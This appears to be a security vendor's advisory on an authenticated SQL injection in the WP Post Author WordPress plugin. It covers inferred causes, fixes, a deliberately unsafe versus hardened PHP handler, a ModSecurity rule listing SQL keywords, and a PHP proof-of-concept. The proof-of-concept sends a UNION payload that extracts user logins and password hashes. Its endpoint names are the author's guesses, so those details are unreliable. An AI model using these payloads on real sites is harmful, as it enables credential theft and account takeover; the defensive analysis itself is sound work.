Atomic Edge analysis of CVE-2026-57643 (metadata-based): This vulnerability is an authenticated SQL Injection in the WP Post Author plugin for WordPress, affecting versions up to and including 3.9.1. It allows attackers with contributor-level access or higher to append malicious SQL queries to existing database queries, enabling extraction of sensitive data from the WordPress database. The CVSS score is 6.5 (medium-high) due to the low-privilege requirement, network attack vector, and high confidentiality impact.
The root cause, as inferred from the CWE-89 classification and the advisory description, is improper neutralization of special elements used in an SQL command. The description specifically mentions insufficient escaping of a user-supplied parameter and the absence of a prepared statement in an existing SQL query. Based on the plugin's functionality, the flaw most likely sits in a database query that handles author profile data, multiple-author assignments, or guest author management, and the vulnerable parameter is probably passed through an AJAX handler or REST endpoint that processes author metadata. Without source code, these conclusions are inferred from the CWE and from description patterns common to WordPress plugin SQLi vulnerabilities.
For exploitation, an authenticated attacker with contributor-level access can craft a POST request to an AJAX action endpoint such as `/wp-admin/admin-ajax.php?action=wp_post_author_save` or a similar handler that saves or retrieves author profile data. The attacker would supply a malicious value in a parameter (likely an ID or slug field) that contains SQL injection payloads, such as `1 UNION SELECT user_pass,user_login FROM wp_users`. The attacker can then extract sensitive information like user credentials, email addresses, or other database contents. The attack requires a valid nonce and contributor-level capabilities, but the lack of proper parameter sanitization allows subverting the SQL query.
Remediation for this vulnerability, as patched in version 3.10.0, likely involves replacing direct `$wpdb->query()` calls with parameterized queries built by `$wpdb->prepare()`. Specifically, the plugin should pass any dynamic user input into the SQL statement through `%s` and `%d` placeholders rather than string interpolation. Additionally, the plugin should apply `sanitize_text_field()` or `intval()` to input parameters and verify that the user has the appropriate capability before executing the query. Atomic Edge analysis recommends reviewing every `$wpdb->get_results()`, `$wpdb->get_var()`, and `$wpdb->query()` call in the plugin where user-supplied data is interpolated directly into the SQL string.
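As an added illustration of that remediation (hypothetical code, not the plugin's own source, which this analysis did not have), a weak AJAX handler that interpolates `author_id` into a `$wpdb` query is shown next to the hardened form using `check_ajax_referer()`, `current_user_can()` and `$wpdb->prepare()`. The `wppa_*` function names, the `wp_post_author_save` action, the `author_id` parameter and the table name are assumptions carried over from the analysis.

```php
<?php
// Added example, not the plugin's own code. Handler, action, parameter and
// table names (wppa_*, wp_post_author_save, author_id) are assumptions
// taken from the analysis above, which had no access to the plugin source.

// Weak pattern (the shape CWE-89 describes): the request parameter is
// dropped straight into the SQL string, so a value such as "1 UNION ..."
// reaches MySQL as SQL rather than as data.
function wppa_get_author_unsafe() {
    global $wpdb;
    $author_id = isset( $_POST['author_id'] ) ? $_POST['author_id'] : '';
    $table     = $wpdb->prefix . 'post_author_profiles'; // assumed table
    $rows      = $wpdb->get_results(
        "SELECT id, display_name FROM {$table} WHERE id = {$author_id}"
    );
    wp_send_json_success( $rows );
}

// Hardened pattern: nonce check, capability check, type coercion and a
// prepared statement. A Contributor already holds edit_posts, so the
// capability check alone would not stop this attacker; it is the %d
// placeholder (integer cast) that removes the injection.
function wppa_get_author_safe() {
    global $wpdb;

    check_ajax_referer( 'wppa_author_nonce' );   // nonce action: assumption
    if ( ! current_user_can( 'edit_posts' ) ) {
        wp_send_json_error( 'forbidden', 403 );   // exits
    }

    $author_id = isset( $_POST['author_id'] ) ? absint( $_POST['author_id'] ) : 0;
    if ( 0 === $author_id ) {
        wp_send_json_error( 'invalid author_id', 400 ); // exits
    }

    // For a string key (e.g. a slug) the same pattern uses %s, which quotes
    // and escapes the value; sanitize_title() would normalise the slug first:
    // $wpdb->prepare( "SELECT id FROM {$table} WHERE slug = %s",
    //                 sanitize_title( $_POST['author_slug'] ) );
    $table = $wpdb->prefix . 'post_author_profiles'; // assumed table
    $sql   = $wpdb->prepare(
        "SELECT id, display_name FROM {$table} WHERE id = %d",
        $author_id
    );
    wp_send_json_success( $wpdb->get_results( $sql ) );
}

add_action( 'wp_ajax_wp_post_author_save', 'wppa_get_author_safe' );
```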
The primary impact of successful exploitation is unauthorized access to sensitive information stored in the WordPress database. This includes user credentials (hashed passwords), email addresses, session tokens, and potentially private site options or post content. An attacker could extract user password hashes for offline cracking, leading to account takeover. The authenticated requirement (contributor+) slightly reduces the risk but still exposes internal data. The confidentiality impact is high, while integrity and availability remain unaffected.
Here you will find our ModSecurity-compatible rule to protect against this particular CVE.
```
# Atomic Edge WAF Rule - CVE-2026-57643 (metadata-based)
# Blocks SQL injection attempts targeting the WP Post Author plugin AJAX handlers
# Assumes the vulnerable action is 'wp_post_author_save' or similar and that
# the injected parameter is 'author_id'; adjust both if the plugin differs
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" \
    "id:20261943,phase:2,deny,status:403,chain,msg:'CVE-2026-57643 - WP Post Author SQLi via AJAX (metadata-based)',severity:'CRITICAL',tag:'CVE-2026-57643'"
    SecRule ARGS_POST:action "@rx ^wp_post_author_(save|delete|update|get)$" \
        "chain"
        SecRule ARGS_POST:author_id "@rx (?i)(?:UNION|SELECT|INSERT|UPDATE|DELETE|DROP|OR\s+1=1|'|--|#|\b(?:0x[0-9a-fA-F]+|CHAR\(|CONCAT\(|BENCHMARK\(|SLEEP\())" \
            "t:urlDecode,t:lowercase"
```
```php
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-57643 - WP Post Author – Author Box, Multiple Authors, Guest Authors & Custom Avatars <= 3.9.1 - Authenticated (Contributor+) SQL Injection

// Configuration
$target_url = 'http://example.com'; // Change to target WordPress site
$username   = 'contributor';        // Attacker's username
$password   = 'password';           // Attacker's password

// Login to WordPress
$login_url  = $target_url . '/wp-login.php';
$login_data = [
    'log'        => $username,
    'pwd'        => $password,
    'rememberme' => 'forever',
    'wp-submit'  => 'Log In',
];
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$response = curl_exec($ch);
curl_close($ch);

// Extract nonce - The AJAX action likely requires a nonce
// The actual action name is inferred from plugin patterns; adjust if needed
$ajax_action = 'wp_post_author_save'; // Common AJAX hook for saving author data

// Step 1: Get nonce from admin page or directly via wp_ajax_nopriv_* check
// Since we need a valid nonce, we first access the admin page where the form is rendered
$ajax_nonce_url = $target_url . '/wp-admin/admin-ajax.php?action=' . $ajax_action;
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ajax_nonce_url);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$nonce_response = curl_exec($ch);
curl_close($ch);

// For simplicity, we assume a nonce can be obtained from the page source.
// In real exploitation, the attacker would scrape the nonce from the form.
// Here we use a placeholder; actual exploitation requires a valid nonce.
$nonce = '1234567890abcdef';

// SQL injection payload: UNION-based to extract user credentials
$sql_payload = "1 UNION ALL SELECT user_login,user_pass,user_email,display_name FROM wp_users-- ";

// Send the malicious request
$ajax_url  = $target_url . '/wp-admin/admin-ajax.php';
$post_data = [
    'action'      => $ajax_action,
    '_ajax_nonce' => $nonce,
    // Parameter name likely involved - adjust based on actual vulnerable parameter
    'author_id'   => $sql_payload,
];
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$result = curl_exec($ch);
curl_close($ch);

echo "Raw Response:\n";
echo $result;
?>
```